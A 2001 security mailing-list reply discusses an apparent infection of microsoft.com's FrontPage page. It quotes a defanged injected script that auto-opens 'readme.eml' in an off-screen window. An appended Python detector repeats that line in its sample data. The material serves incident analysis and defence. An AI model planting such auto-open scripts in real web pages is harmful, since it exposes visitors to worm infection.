Security Incidents mailing list archives

RE: Please tell me I'm wrong: microsoft.com infected


From: "David LeBlanc" <dleblanc () microsoft com>
Date: Wed, 19 Sep 2001 20:07:15 -0700



-----Original Message-----
From: Michael H. Warfield [mailto:mhw () wittsend com] 
 
      Yes, indeedie do.  Just did a wget http://www.microsoft.com/frontpage
and here is what's on da bottom:
 
[html][script language="JavaScript"]window.open("readme.eml", 
null, "resizable=no,top=6000,left=6000")[/script][/html]
 
      Defanged by turning angle brackets into square brackets 
even though it's not in an html attachment.  ;-)

Though you might notice that the readme.eml never made it to the web
site, so it won't actually get anyone - just good for stirring people
up.

Lesson here is that you not only have to make sure your servers are
patched, but you might want to quickly check content that others
propagate to you before you make it live 8-)


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
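
A pre-publication content check in the spirit of the lesson in the message above, as an added example that is not part of the original message or of either poster's tooling: it flags script blocks that call window.open() on a .eml file, reports whether they sit after the page's own closing html tag, and whether the referenced file is staged for publication. The function name, the `staged_files` parameter and the sample pages are assumptions constructed for illustration.

```python
import re

# A script element, in real angle brackets or in the square-bracket
# defanged form quoted in the message above.
SCRIPT_RE = re.compile(
    r'[<\[]script\b[^>\]]*[>\]](?P<body>.*?)[<\[]/script[>\]]',
    re.IGNORECASE | re.DOTALL,
)
# window.open() whose first argument is a quoted name ending in .eml
OPEN_EML_RE = re.compile(
    r'window\.open\(\s*["\'](?P<target>[^"\']+\.eml)["\']', re.IGNORECASE
)
CLOSE_HTML_RE = re.compile(r'[<\[]/html[>\]]', re.IGNORECASE)

# Constructed sample: a stand-in page followed by the defanged script
# exactly as quoted in the message.
SAMPLE_PAGE = (
    '[html][body]constructed page body[/body][/html]\n'
    '[html][script language="JavaScript"]window.open("readme.eml", \n'
    'null, "resizable=no,top=6000,left=6000")[/script][/html]\n'
)
# Constructed sample: an ordinary popup that should not be flagged.
CLEAN_PAGE = '[html][script]window.open("help.html")[/script][/html]'


def find_eml_popups(page_text, staged_files=()):
    """Return one finding per script block that opens a .eml file.

    staged_files is a hypothetical input: the names of the files that
    would be published next to the page (e.g. a staging directory listing).
    """
    staged = {name.lower() for name in staged_files}
    first_close = CLOSE_HTML_RE.search(page_text)
    findings = []
    for script in SCRIPT_RE.finditer(page_text):
        hit = OPEN_EML_RE.search(script.group("body"))
        if hit is None:
            continue
        target = hit.group("target")
        findings.append({
            "target": target,
            # Script located after the page's first closing html tag,
            # i.e. content appended to an already complete document.
            "after_closing_html": bool(
                first_close and script.start() >= first_close.end()
            ),
            # Whether the referenced message file is staged as well.
            "target_staged": target.lower() in staged,
        })
    return findings
```

A finding with `target_staged` false corresponds to the situation described in the reply: the script is on the page but the file it opens is not on the site.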

